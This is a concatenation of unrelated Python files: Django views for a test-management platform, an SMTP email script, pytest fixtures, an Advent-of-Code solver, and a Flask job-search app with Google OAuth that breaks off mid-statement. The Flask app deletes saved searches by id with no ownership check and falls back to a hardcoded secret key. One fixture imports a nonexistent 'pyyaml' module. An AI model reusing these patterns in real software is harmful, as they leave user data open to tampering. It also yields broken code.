        return redirect(reverse("at:api_test_manage"))
    return render(request, 'api_step_update.html', context=context)
# bug管理
def bug_manage(request):
    """Paginated bug list."""
    page_number = request.GET.get('page', 1)
    bugs_page = Paginator(Bug.objects.all(), 10).page(page_number)
    context = {
        'title': 'Bug列表',
        'bugs': bugs_page,
    }
    return render(request, 'bug_manage.html', context=context)
# 添加bug
def add_bug(request):
    """GET: render the new-bug form. POST: create a bug (name required)."""
    if request.method == "GET":
        context = {
            'title': '添加Bug',
            'pro_names': Product.objects.all(),
        }
        return render(request, 'add_bug.html', context=context)
    elif request.method == "POST":
        bug_name = request.POST.get('bug_name')
        if bug_name == "":
            return redirect(reverse('at:add_bug'))
        Bug(
            bug_name=bug_name,
            bug_detail=request.POST.get('bug_detail'),
            bug_level=request.POST.get('bug_level'),
            bug_status=request.POST.get('bug_status'),
            bug_creat_er=request.POST.get('bug_creat_er'),
            bug_assign=request.POST.get('bug_assign'),
            bug_pro_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:bug_manage'))
    return redirect(reverse('at:add_bug'))
# 删除bug
def bug_delete(request):
    """Delete one bug; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    bug_id = request.GET['bug_id']
    try:
        Bug.objects.get(id=bug_id).delete()
        return HttpResponse("1")
    except (Bug.DoesNotExist, ValueError):
        return HttpResponse("2")
# 编辑bug
def bug_update(request):
    """GET: render the bug edit form. POST: persist the edits.

    Fix: submitting an empty bug name previously redirected to the *add*
    page (``at:add_bug``); it now re-renders the edit form, consistent with
    update_product and the other *_update views.
    """
    bug_id = request.GET.get("bug.id")
    pro_names = Product.objects.all()
    bug = Bug.objects.filter(id=bug_id).first()
    data = {
        'title': '编辑Bug',
        'bug': bug,
        'pro_names': pro_names,
    }
    if request.method == "POST":
        bug_name = request.POST.get('bug_name')
        if bug_name == "":
            # stay on the edit form instead of bouncing to the add page
            return render(request, 'bug_update.html', context=data)
        Bug.objects.filter(id=bug_id).update(
            bug_name=bug_name,
            bug_detail=request.POST.get('bug_detail'),
            bug_level=request.POST.get('bug_level'),
            bug_status=request.POST.get('bug_status'),
            bug_creat_er=request.POST.get('bug_creat_er'),
            bug_assign=request.POST.get('bug_assign'),
            bug_pro_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:bug_manage"))
    return render(request, 'bug_update.html', context=data)
# 设置管理
def set_manage(request):
    """Paginated list of shared settings."""
    page_number = request.GET.get('page', 1)
    sets_page = Paginator(Set.objects.all(), 10).page(page_number)
    context = {
        'title': '公共设置',
        'sets': sets_page,
    }
    return render(request, 'set_manage.html', context=context)
# 用户设置管理
def set_user_manage(request):
    """Paginated list of registered users."""
    page_number = request.GET.get('page', 1)
    users_page = Paginator(ATUser.objects.all(), 10).page(page_number)
    context = {
        'title': '用户管理',
        'at_user': users_page,
    }
    return render(request, 'set_user_manage.html', context=context)
# 添加管理
def add_set(request):
    """GET: render the new-setting form. POST: create it.

    Rejects an empty or duplicate setting name by bouncing back to the form.
    """
    if request.method == 'GET':
        return render(request, 'add_set.html', context={'title': '添加设置'})
    elif request.method == 'POST':
        set_name = request.POST.get('set_name')
        duplicate = Set.objects.filter(set_name=set_name).exists()
        if set_name == "" or duplicate:
            return redirect(reverse('at:add_set'))
        # trailing underscore: avoid shadowing the builtin `set`
        entry = Set()
        entry.set_name = set_name
        entry.set_value = request.POST.get('set_value')
        entry.save()
        return redirect(reverse('at:set_manage'))
    return redirect(reverse('at:add_set'))
# App用例管理
def app_test_manage(request):
    """Paginated list of App test cases."""
    page_number = request.GET.get('page', 1)
    tests_page = Paginator(Apptest.objects.all(), 10).page(page_number)
    context = {
        'title': 'App用例管理',
        'app_tests': tests_page,
    }
    return render(request, 'app_test_manage.html', context=context)
# 添加App用例
def add_app_test(request):
    """GET: render the new App-case form. POST: create the case.

    Rejects an empty or duplicate case name by bouncing back to the form.
    """
    if request.method == "GET":
        context = {
            'title': '添加App用例',
            'pro_names': Product.objects.all(),
        }
        return render(request, 'add_app_test.html', context=context)
    elif request.method == "POST":
        app_t_name = request.POST.get('app_t_name')
        duplicate = Apptest.objects.filter(app_t_name=app_t_name).exists()
        if app_t_name == "" or duplicate:
            return redirect(reverse('at:add_app_test'))
        Apptest(
            app_t_name=app_t_name,
            app_t_desc=request.POST.get('app_t_desc'),
            app_ter=request.POST.get('app_ter'),
            app_t_res=request.POST.get('app_t_res'),
            app_t_pro_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:app_test_manage'))
    return redirect(reverse('at:add_app_test'))
# 删除app用例
def app_delete(request):
    """Delete one App case; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    app_id = request.GET['app_id']
    try:
        Apptest.objects.get(id=app_id).delete()
        return HttpResponse("1")
    except (Apptest.DoesNotExist, ValueError):
        return HttpResponse("2")
# 编辑app用例
def app_update(request):
    """GET: render the App-case edit form. POST: persist the edits."""
    app_id = request.GET.get("app_t.id")
    context = {
        'title': '编辑App用例',
        'app_t': Apptest.objects.filter(id=app_id).first(),
        'pro_names': Product.objects.all(),
    }
    if request.method == "POST":
        app_t_name = request.POST.get('app_t_name')
        if app_t_name == "":
            return redirect(reverse('at:app_update'))
        Apptest.objects.filter(id=app_id).update(
            app_t_name=app_t_name,
            app_t_desc=request.POST.get('app_t_desc'),
            app_ter=request.POST.get('app_ter'),
            app_t_res=request.POST.get('app_t_res'),
            app_t_pro_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:app_test_manage"))
    return render(request, 'app_update.html', context=context)
# App用例步骤管理
def app_step_manage(request):
    """Step overview for the App case selected via the `app_t.id` query param."""
    app_test = Apptest.objects.get(id=request.GET.get('app_t.id'))
    context = {
        'title': 'App用例步骤管理',
        'app_test': app_test,
        # NOTE(review): all steps are passed, not just this case's —
        # presumably the template filters by case; confirm.
        'app_steps': Appteststep.objects.all(),
    }
    return render(request, 'app_step_manage.html', context=context)
# 添加App用例步骤
def add_app_step(request):
    """GET: render the new App-step form. POST: create the step (name required)."""
    if request.method == "GET":
        context = {
            'title': '添加App用例步骤',
            'app_test': Apptest.objects.all(),
        }
        return render(request, 'add_app_step.html', context=context)
    elif request.method == "POST":
        app_step = request.POST.get('app_step')
        if app_step == "":
            return redirect(reverse('at:add_app_step'))
        Appteststep(
            app_step=app_step,
            app_find_method=request.POST.get('app_find_method'),
            app_element=request.POST.get('app_element'),
            app_opt_method=request.POST.get('app_opt_method'),
            app_test_data=request.POST.get('app_test_data'),
            app_assert_data=request.POST.get('app_assert_data'),
            app_result=request.POST.get('app_result'),
            app_test_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:app_test_manage'))
    return redirect(reverse('at:add_app_step'))
# 删除App用例步骤
def app_step_delete(request):
    """Delete one App step; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    app_step_id = request.GET['app_step_id']
    try:
        Appteststep.objects.get(id=app_step_id).delete()
        return HttpResponse("1")
    except (Appteststep.DoesNotExist, ValueError):
        return HttpResponse("2")
# 编辑App用例步骤
def app_step_update(request):
    """GET: render the App-step edit form. POST: persist the edits."""
    app_step_id = request.GET.get("app_step.id")
    context = {
        'title': '编辑App用例步骤',
        'app_step': Appteststep.objects.filter(id=app_step_id).first(),
        'app_test': Apptest.objects.all(),
    }
    if request.method == "POST":
        new_step = request.POST.get('app_step')
        if new_step == "":
            return redirect(reverse('at:app_step_update'))
        Appteststep.objects.filter(id=app_step_id).update(
            app_step=new_step,
            app_find_method=request.POST.get('app_find_method'),
            app_element=request.POST.get('app_element'),
            app_opt_method=request.POST.get('app_opt_method'),
            app_test_data=request.POST.get('app_test_data'),
            app_assert_data=request.POST.get('app_assert_data'),
            app_result=request.POST.get('app_result'),
            app_test_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:app_test_manage"))
    return render(request, 'app_step_update.html', context=context)
# Web用例管理
def web_test_manage(request):
    """Paginated list of Web test cases."""
    page_number = request.GET.get('page', 1)
    tests_page = Paginator(Webtest.objects.all(), 10).page(page_number)
    context = {
        'title': 'Web用例管理',
        'web_tests': tests_page,
    }
    return render(request, 'web_test_manage.html', context=context)
# 添加Web用例
def add_web_test(request):
    """GET: render the new Web-case form. POST: create the case.

    Rejects an empty or duplicate case name by bouncing back to the form.
    """
    if request.method == "GET":
        context = {
            'title': '添加Web用例',
            'pro_names': Product.objects.all(),
        }
        return render(request, 'add_web_test.html', context=context)
    elif request.method == "POST":
        web_t_name = request.POST.get('web_t_name')
        duplicate = Webtest.objects.filter(web_t_name=web_t_name).exists()
        if web_t_name == "" or duplicate:
            return redirect(reverse('at:add_web_test'))
        Webtest(
            web_t_name=web_t_name,
            web_t_desc=request.POST.get('web_t_desc'),
            web_ter=request.POST.get('web_ter'),
            web_t_res=request.POST.get('web_t_res'),
            web_t_pro_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:web_test_manage'))
    return redirect(reverse('at:add_web_test'))
# 删除web用例
def web_delete(request):
    """Delete one Web case; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    web_id = request.GET['web_id']
    try:
        Webtest.objects.get(id=web_id).delete()
        return HttpResponse("1")
    except (Webtest.DoesNotExist, ValueError):
        return HttpResponse("2")
# 编辑web用例
def web_update(request):
    """GET: render the Web-case edit form. POST: persist the edits."""
    web_id = request.GET.get("web_t.id")
    context = {
        'title': '编辑Web用例',
        'web_t': Webtest.objects.filter(id=web_id).first(),
        'pro_names': Product.objects.all(),
    }
    if request.method == "POST":
        web_t_name = request.POST.get('web_t_name')
        if web_t_name == "":
            return redirect(reverse('at:web_update'))
        Webtest.objects.filter(id=web_id).update(
            web_t_name=web_t_name,
            web_t_desc=request.POST.get('web_t_desc'),
            web_ter=request.POST.get('web_ter'),
            web_t_res=request.POST.get('web_t_res'),
            web_t_pro_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:web_test_manage"))
    return render(request, 'web_update.html', context=context)
# Web用例步骤管理
def web_step_manage(request):
    """Step overview for the Web case selected via the `web_t.id` query param."""
    web_t = Webtest.objects.get(id=request.GET.get('web_t.id'))
    context = {
        'title': 'Web用例步骤管理',
        'web_t': web_t,
        # NOTE(review): all steps are passed, not just this case's —
        # presumably the template filters by case; confirm.
        'web_steps': Webteststep.objects.all(),
    }
    return render(request, 'web_step_manage.html', context=context)
# 添加Web用例步骤
def add_web_step(request):
    """GET: render the new Web-step form. POST: create the step (name required)."""
    if request.method == "GET":
        context = {
            'title': '添加Web用例步骤',
            'web_test': Webtest.objects.all(),
        }
        return render(request, 'add_web_step.html', context=context)
    elif request.method == "POST":
        web_step = request.POST.get('web_step')
        if web_step == "":
            return redirect(reverse('at:add_web_step'))
        Webteststep(
            web_step=web_step,
            web_find_method=request.POST.get('web_find_method'),
            web_element=request.POST.get('web_element'),
            web_opt_method=request.POST.get('web_opt_method'),
            web_test_data=request.POST.get('web_test_data'),
            web_assert_data=request.POST.get('web_assert_data'),
            web_result=request.POST.get('web_result'),
            web_test_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:web_test_manage'))
    return redirect(reverse('at:add_web_step'))
# web用例步骤删除
def web_step_delete(request):
    """Delete one Web step; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    web_step_id = request.GET['web_step_id']
    try:
        Webteststep.objects.get(id=web_step_id).delete()
        return HttpResponse("1")
    except (Webteststep.DoesNotExist, ValueError):
        return HttpResponse("2")
# web用例步骤编辑
def web_step_update(request):
    """GET: render the Web-step edit form. POST: persist the edits."""
    web_step_id = request.GET.get("web_step.id")
    context = {
        'title': '编辑Web用例步骤',
        'web_step': Webteststep.objects.filter(id=web_step_id).first(),
        'web_test': Webtest.objects.all(),
    }
    if request.method == "POST":
        new_step = request.POST.get('web_step')
        if new_step == "":
            return redirect(reverse('at:web_step_update'))
        Webteststep.objects.filter(id=web_step_id).update(
            web_step=new_step,
            web_find_method=request.POST.get('web_find_method'),
            web_element=request.POST.get('web_element'),
            web_opt_method=request.POST.get('web_opt_method'),
            web_test_data=request.POST.get('web_test_data'),
            web_assert_data=request.POST.get('web_assert_data'),
            web_result=request.POST.get('web_result'),
            web_test_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:web_test_manage"))
    return render(request, 'web_step_update.html', context=context)
# 接口报告
def apis_report(request):
    """Paginated listing of generated single-interface report files."""
    # NOTE(review): hard-coded Windows path — consider moving to settings.
    path = "E:/auto_test/apis_auto_test_case/report/"
    report_files = os.listdir(path)
    page_number = request.GET.get('page', 1)
    reports_page = Paginator(report_files, 10).page(page_number)
    context = {
        'title': '单一接口报告',
        'apis_list': reports_page,
    }
    return render(request, 'apis_report.html', context=context)
def api_test_report(request):
    """Paginated listing of generated flow-case report files."""
    # NOTE(review): hard-coded Windows path — consider moving to settings.
    path = "E:/auto_test/api_test_auto_test_case/report/"
    report_files = os.listdir(path)
    page_number = request.GET.get('page', 1)
    reports_page = Paginator(report_files, 10).page(page_number)
    context = {
        'title': '流程接口报告',
        'api_test_list': reports_page,
    }
    return render(request, 'api_test_report.html', context=context)
def web_report(request):
    """Paginated listing of generated Web-test report files."""
    # NOTE(review): hard-coded Windows path — consider moving to settings.
    path = "E:/auto_test/web_auto_test_case/report/"
    report_files = os.listdir(path)
    page_number = request.GET.get('page', 1)
    reports_page = Paginator(report_files, 10).page(page_number)
    context = {
        'title': 'Web测试报告',
        'web_list': reports_page,
    }
    return render(request, 'web_report.html', context=context)
def app_report(request):
    """Paginated listing of generated App-test report files."""
    # NOTE(review): hard-coded Windows path — consider moving to settings.
    path = "E:/auto_test/app_auto_test_case/report/"
    report_files = os.listdir(path)
    page_number = request.GET.get('page', 1)
    reports_page = Paginator(report_files, 10).page(page_number)
    context = {
        'title': 'App测试报告',
        'app_list': reports_page,
    }
    return render(request, 'app_report.html', context=context)
# 定时任务列表
def celery_manage(request):
    """Overview of periodic tasks plus their interval and crontab schedules."""
    context = {
        'title': '定时任务',
        'task_list': PeriodicTask.objects.all(),
        # interval schedules (e.g. run once an hour)
        'periodic_list': IntervalSchedule.objects.all(),
        # crontab schedules (e.g. every day at a fixed time)
        'cron_list': CrontabSchedule.objects.all(),
    }
    return render(request, 'celery_manage.html', context=context)
# 删除celery
def celery_delete(request):
    """Delete one periodic task; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    task_id = request.GET['task_id']
    try:
        PeriodicTask.objects.get(id=task_id).delete()
        return HttpResponse('1')
    except (PeriodicTask.DoesNotExist, ValueError):
        return HttpResponse('2')
# 启动celery条件
def celery_page(request):
    """Static page describing the requirements for starting celery."""
    return render(request, 'celery_page.html', context={'title': '启动celery条件'})
# 产品搜索
def pro_search(request):
    """Filter products by name substring (case-insensitive), paginated."""
    search_name = request.GET.get('p_product_name', '')
    # __icontains: case-insensitive substring match
    matches = Product.objects.filter(p_product_name__icontains=search_name)
    page_number = request.GET.get('page', 1)
    products_page = Paginator(matches, 10).page(page_number)
    context = {
        'title': '产品中心',
        'products': products_page,
        'search_name': search_name,
    }
    return render(request, 'product_manage.html', context=context)
# 用例搜索
def apis_search(request):
    """Search api cases by name substring (case-insensitive), paginated.

    Fix: default the query parameter to '' (consistent with pro_search) so a
    request without ``api_name`` filters on '' instead of crashing on None.
    """
    search_name = request.GET.get('api_name', '')
    api_list = Apis.objects.filter(api_name__icontains=search_name)
    paginator = Paginator(api_list, 10)
    page = request.GET.get('page', 1)
    api_lists = paginator.page(page)
    data = {
        'title': '接口用例管理',
        'search_name': search_name,
        'apis_list': api_lists,
    }
    return render(request, 'apis_manage.html', context=data)
# 流程用例搜索
def api_test_search(request):
    """Search flow cases by name substring, paginated.

    Fix: default the query parameter to '' (consistent with pro_search) so a
    request without ``api_t_name`` filters on '' instead of crashing on None.
    """
    search_name = request.GET.get('api_t_name', '')
    api_t_list = Apitest.objects.filter(api_t_name__contains=search_name)
    paginator = Paginator(api_t_list, 10)
    page = request.GET.get('page', 1)
    api_t_lists = paginator.page(page)
    data = {
        'title': '流程用例管理',
        'search_name': search_name,
        'api_test': api_t_lists,
    }
    return render(request, 'api_test_manage.html', context=data)
# Web用例搜索
def web_search(request):
    """Search Web cases by name substring, paginated.

    Fix: default the query parameter to '' (consistent with pro_search) so a
    request without ``web_t_name`` filters on '' instead of crashing on None.
    """
    search_name = request.GET.get('web_t_name', '')
    web_t_list = Webtest.objects.filter(web_t_name__contains=search_name)
    paginator = Paginator(web_t_list, 10)
    page = request.GET.get('page', 1)
    web_lists = paginator.page(page)
    data = {
        'title': 'Web用例管理',
        'web_tests': web_lists,
        'search_name': search_name,
    }
    return render(request, 'web_test_manage.html', context=data)
def app_search(request):
    """Search App cases by name substring, paginated.

    Fix: default the query parameter to '' (consistent with pro_search) so a
    request without ``app_t_name`` filters on '' instead of crashing on None.
    """
    search_name = request.GET.get('app_t_name', '')
    app_t_list = Apptest.objects.filter(app_t_name__contains=search_name)
    paginator = Paginator(app_t_list, 10)
    page = request.GET.get('page', 1)
    app_lists = paginator.page(page)
    data = {
        'title': 'App用例管理',
        'app_tests': app_lists,
        'search_name': search_name,
    }
    return render(request, 'app_test_manage.html', context=data)
def bug_search(request):
    """Search bugs by name substring, paginated.

    Fixes: (1) default the query parameter to '' so a request without
    ``bug_name`` filters on '' instead of crashing on None; (2) page title
    was copy-pasted from the App page ('App用例管理') — use the bug-list
    title 'Bug列表', matching bug_manage.
    """
    search_name = request.GET.get('bug_name', '')
    bug_list = Bug.objects.filter(bug_name__contains=search_name)
    paginator = Paginator(bug_list, 10)
    page = request.GET.get('page', 1)
    bug_lists = paginator.page(page)
    data = {
        'title': 'Bug列表',
        'search_name': search_name,
        'bugs': bug_lists,
    }
    return render(request, 'bug_manage.html', context=data)
# 持续集成页面
def jenkins_page(request):
    """Static page for the Jenkins CI integration."""
    return render(request, 'jenkins_page.html', context={'title': 'jenkins页面'})
# 性能测试页面
def locust_page(request):
    """Static page for the Locust load-testing integration."""
    return render(request, 'locust_page.html', context={'title': 'locust页面'})
# Celery测试
def do(request):
    """Enqueue the ApiTask celery job asynchronously and acknowledge at once."""
    print('start do...')
    # .delay() only queues the task; it does not run inline
    ApiTask.delay()
    print('end do...')
    return JsonResponse({'result': 'ok'})
|
from more_itertools import ilen
from my.location.ip import ips
def test_ips() -> None:
    """The ip provider should yield a healthy number of entries."""
    entry_count = ilen(ips())
    assert entry_count > 10
|
# One-shot SMTP example: sends a fixed plain-text message through Gmail.
import json  # NOTE(review): unused in this script
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
# message body
msg = MIMEMultipart()
message = "Email recebido!"
# credentials and headers (placeholders — fill in before running)
password = "*** Senha do seu e-mail ***"
msg['From'] = "*** login do e-mail que vai enviar ***"
msg['To'] = "*** login do e-mail que vai receber ***"
msg['Subject'] = "Enviando gmail "  # subject line
# connect (STARTTLS on port 587), authenticate, and send
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP('smtp.gmail.com', port=587)
server.starttls()
server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
from pytest import fixture
from starlette.config import environ
from starlette.testclient import TestClient
from app.db.mongodb import get_database
from app.core.config import database_name, users_collection_name
import pyyaml
@fixture(scope="session")
def test_user():
    """Canonical user payload shared across the whole test session."""
    payload = {
        "email": "user1@example.com",
        "password": "string1",
        "username": "string1",
    }
    return {"user": payload}
@fixture(scope="session")
def test_client(test_user):
    """Session-wide Starlette TestClient for the app.

    After the session finishes (code past ``yield``), the user created by the
    tests is removed from the database so runs stay idempotent.
    """
    from app.main import app
    with TestClient(app) as test_client:
        yield test_client
    # teardown: drop the test user created during the session
    import asyncio
    db = asyncio.run(get_database())
    db[database_name][users_collection_name].delete_one({"username": test_user["user"]["username"]})
# Must run before 'settings' is imported — Starlette config raises if an
# environ key is set after it has already been read.
environ['TESTING'] = 'TRUE'
|
class Probe:
    """Point probe with drag on x and gravity on y (AoC 2021 day 17)."""

    def __init__(self, vx, vy, x, y):
        self.vx = vx
        self.vy = vy
        self.x = x
        self.y = y

    def update(self):
        """Advance one step: move, then pull vx toward 0 and decrement vy."""
        self.x += self.vx
        self.y += self.vy
        if self.vx > 0:
            self.vx -= 1
        elif self.vx < 0:
            self.vx += 1
        self.vy -= 1

    def contained(self, x1, x2, y1, y2):
        """True when the probe lies inside the inclusive box."""
        return x1 <= self.x <= x2 and y1 <= self.y <= y2

    def reachable(self, x1, x2, y1, y2):
        """True while the probe could still enter the box."""
        not_past_right = self.x <= x2
        still_rising_or_above = self.y <= y2 and self.vy > -1
        return not_past_right and (still_rising_or_above or self.y >= y1)
# Puzzle input: target box, x in [175, 227], y in [-134, -79].
target = (175,227, -134,-79)
# Accumulates every (vx, vy) pair that hits the target (filled by test()).
o = []
def test(vx, vy, part2):
    """Simulate one launch from the origin.

    Returns the peak height reached (part 1) or 1 (part 2) when the probe
    hits the target, and 0 when it leaves the reachable window first.
    """
    p = Probe(vx, vy, 0, 0)
    ys = []
    while p.reachable(*target):
        p.update()
        ys.append(p.y)
        if p.contained(*target):
            o.append([vx, vy])  # record the hit for the range printout below
            return 1 if part2 else max(ys)
    return 0
# Part 1: highest altitude over all hitting trajectories.
print("Part 1", max(test(i, j, False) for i in range(0, 304) for j in range(-200, 200)))
# Part 2: number of distinct hitting velocity pairs.
print("Part 2", sum(test(i, j, True) for i in range(0, 304) for j in range(-200, 200)))
# Ranges of hitting velocities, for inspection.
xs, ys = zip(*o)
print(min(xs), max(xs))
print(min(ys), max(ys))
#!/usr/bin/env python
from flask import Flask, render_template, url_for, request, redirect, session
from flask_session import Session
import datetime
from dateutil.parser import parse as parse_date
from utils import create_connection
import pandas as pd
import logging
import sys
import os
import re
import sqlite3
import json
from flask_login import (
LoginManager,
current_user,
login_required,
login_user,
logout_user,
)
from oauthlib.oauth2 import WebApplicationClient
import requests
from user import User
from functools import lru_cache
# Module-level logger writing structured lines to stdout.
logger = logging.getLogger(__name__)
log_handler = logging.StreamHandler(sys.stdout)
log_handler.setFormatter(
    logging.Formatter(
        "%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(funcName)s "
        "- line %(lineno)d"
    )
)
logger.addHandler(log_handler)
logger.setLevel(logging.INFO)
app = Flask(__name__)
# Set up Flask-Session: server-side sessions stored on the filesystem.
app.config.from_object(__name__)
app.config['SESSION_TYPE'] = 'filesystem'
try:
    with open(".secret.json") as f:
        app.config['SECRET_KEY'] = json.load(f)["flask_session_key"]
except FileNotFoundError:  # no `.secret.json` file if running in CI
    app.config['SECRET_KEY'] = "JUSTTESTING"
Session(app)
# Trick from SO for properly reloading CSS during development.
app.config['TEMPLATES_AUTO_RELOAD'] = True
set_default_user_id = False
# Google OAuth credentials; absent on the CI server, where a fixed test
# user id is used instead (see set_default_user_id).
try:
    with open(".secret.json") as f:
        cred = json.load(f)["oauth_cred"]
    GOOGLE_CLIENT_ID = cred.get("GOOGLE_CLIENT_ID", None)
    GOOGLE_CLIENT_SECRET = cred.get("GOOGLE_CLIENT_SECRET", None)
    client = WebApplicationClient(GOOGLE_CLIENT_ID)  # OAuth 2 client setup
except FileNotFoundError:  # CI server
    set_default_user_id = True  # to enable tests on CI server
GOOGLE_DISCOVERY_URL = (
    "https://accounts.google.com/.well-known/openid-configuration"
)
# User session management setup
# https://flask-login.readthedocs.io/en/latest
login_manager = LoginManager()
login_manager.init_app(app)
# Flask-Login helper to retrieve a user from our db
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: fetch a User by id.

    NOTE(review): a second module-level ``load_user()`` defined further down
    shadows this name after import. The decorator has already registered this
    function with login_manager, so login keeps working — but consider
    renaming one of them to avoid confusion.
    """
    return User.get(user_id)
def get_google_provider_cfg():
    """Fetch and decode Google's OpenID Connect discovery document."""
    response = requests.get(GOOGLE_DISCOVERY_URL)
    return response.json()
# this function works in conjunction with `dated_url_for` to make sure the browser uses
# the latest version of css stylesheet when modified and reloaded during testing
@app.context_processor
def override_url_for():
    """Expose the cache-busting `dated_url_for` to templates as `url_for`."""
    return {"url_for": dated_url_for}
def dated_url_for(endpoint, **values):
    """`url_for` wrapper that appends a static file's mtime as ``?q=...``.

    Forces browsers to refetch stylesheets after they are modified.
    """
    if endpoint == "static":
        filename = values.get("filename", None)
        if filename:
            static_file = os.path.join(app.root_path, endpoint, filename)
            values["q"] = int(os.stat(static_file).st_mtime)
    return url_for(endpoint, **values)
def load_user():
    """Populate the Flask session from the logged-in user (idempotent).

    NOTE(review): shadows the Flask-Login `load_user(user_id)` loader
    defined above — rename one of the two to avoid confusion.
    """
    if session.get('user_id'):
        # session already populated — nothing to do
        return
    username = current_user.name if current_user.is_authenticated else None  # NOTE(review): unused variable
    if current_user.is_authenticated:
        session['user_id'] = current_user.id
        session['user_name'] = current_user.name
        session['user_email'] = current_user.email
        if session.get('user_id'):
            with create_connection() as conn:
                # look up the account type for the authenticated user
                session['account_type'] = pd.read_sql("""
                SELECT *
                FROM users
                WHERE id=?
                """, conn, params=[current_user.id]).iloc[0].account_type
            if session.get('account_type') != "full":
                # NOTE(review): callers invoke load_user() without using its
                # return value, so this redirect is discarded and the guard
                # has no effect — verify intent.
                return redirect(url_for("index"))
    elif set_default_user_id:  # for CI server
        session['user_id'] = 1
        session['user_name'] = "Testing123"
        # NOTE(review): sets 'user_type' while the authenticated branch sets
        # 'account_type' — looks like a key mismatch; confirm which key is
        # actually read elsewhere.
        session['user_type'] = "full"
    else:  # for dev and prod servers
        session['user_id'] = None
def load_search_table(user_id):
    """Return a DataFrame with every saved search belonging to *user_id*."""
    query = """
        SELECT * FROM search
        WHERE user_id = ?
    """
    with create_connection() as conn:
        return pd.read_sql(query, conn, params=[user_id])
# function could be improved to find whichever candidate shows up most frequently within visible
# text of base_url page. Make sure to use aiohttp to avoid blocking the event loop if this is
# implemented!
def get_company_name(base_url):
    """Best-effort guess at a company name from a career-page URL.

    Splits *base_url* on common URL punctuation, drops generic tokens
    (schemes, "jobs"/"careers", common TLDs, ...) and title-cases the
    first remaining token.

    :param base_url: URL of the company's career page.
    :return: title-cased candidate name, or *base_url* unchanged when every
        token is generic (the original raised IndexError in that case).
    """
    words = re.findall('[^#$%&/.:]{3,}', base_url)
    discard_words = ('career', 'careers', 'job', 'jobs', 'lever', 'www', 'http', 'https', 'gov', 'com')
    candidates = [word for word in words if word not in discard_words]
    if not candidates:
        # e.g. "http://www.jobs.com" — nothing usable left; fall back to
        # the raw URL instead of crashing with IndexError
        return base_url
    return candidates[0].title()
@app.route("/", methods=["POST", "GET"])
def index():
load_user()
search_table = load_search_table(session['user_id'])
if len(search_table):
search_table["action"] = search_table.apply(
lambda row: (
f"{url_for('delete_search', id=row.id)}"
),
axis=1,
)
search_table_html = (search_table
.style.set_table_styles(
[
{
"selector": "th",
"props": [
("background-color", "rgb(122, 128, 138)"),
("color", "black"),
],
}
]
)
.set_table_attributes('border="1"')
.set_properties(
**{"font-size": "10pt", "background-color": "rgb(168, 185, 191)"}
)
.set_properties(
subset=["action"], **{"text-align": "center"}
)
.hide_index()
)
search_table_html = search_table_html.render(escape=False)
else:
search_table_html = None
return render_template('landing_page.html', search_table=search_table, search_table_html=search_table_html)
@app.route("/login")
def login():
# Find out what URL to hit for Google login
google_provider_cfg = get_google_provider_cfg()
authorization_endpoint = google_provider_cfg["authorization_endpoint"]
# Use library to construct the request for Google login and provide
# scopes that let you retrieve user's profile from Google
request_uri = client.prepare_request_uri(
authorization_endpoint,
redirect_uri=request.base_url + "/callback",
scope=["openid", "email", "profile"],
)
return redirect(request_uri)
@app.route("/login/callback")
def callback():
# Get authorization code Google sent back to you
code = request.args.get("code")
# Find out what URL to hit to get tokens that allow you to ask for
# things on behalf of a user
google_provider_cfg = get_google_provider_cfg()
token_endpoint = google_provider_cfg["token_endpoint"]
# Prepare and send request to get tokens! Yay tokens!
token_url, headers, body = client.prepare_token_request(
token_endpoint,
authorization_response=request.url,
redirect_url=request.base_url,
code=code,
)
token_response = requests.post(
token_url,
headers=headers,
data=body,
auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET),
)
# Parse the tokens!
client.parse_request_body_response(json.dumps(token_response.json()))
# Now that we have tokens (yay) let's find and hit URL
# from Google that gives you user's profile information,
# including their Google Profile Image and Email
userinfo_endpoint = google_provider_cfg["userinfo_endpoint"]
uri, headers, body = client.add_token(userinfo_endpoint)
userinfo_response = requests.get(uri, headers=headers, data=body)
# We want to make sure their email is verified.
# The user authenticated with Google, authorized our
# app, and now we've verified their email through Google!
if userinfo_response.json().get("email_verified"):
unique_id = userinfo_response.json()["sub"]
users_email = userinfo_response.json()["email"]
picture = userinfo_response.json()["picture"]
users_name = userinfo_response.json()["given_name"]
else:
return "User email not available or not verified by Google.", 400
# Create a user in our db with the information provided
# by Google
user = User(
id_=unique_id, name=users_name, email=users_email, profile_pic=picture
)
# Doesn't exist? Add to database
if not User.get(unique_id):
User.create(unique_id, users_name, users_email, picture)
# Begin user session by logging the user in
login_user(user)
# Send user back to homepage
return redirect(url_for("index"))
@app.route("/logout")
@login_required
def logout():
logout_user()
session.clear()
return redirect(url_for("index"))
@app.route("/delete_search")
def delete_search():
delete_search_query = """
DELETE FROM search
WHERE id=?
"""
id = request.args.get("id")
with create_connection() as conn:
conn.cursor().execute(delete_search_query, [id])
return redirect(url_for("index"))
@app.route("/about", methods=["POST", "GET"])
def about():
return render_template("about.html")
@app.route("/search_entry", methods=["POST", "GET"])
def search_entry():
load_user()
if request.method == "POST":
with create_connection() as conn:
conn.cursor().execute(f"""
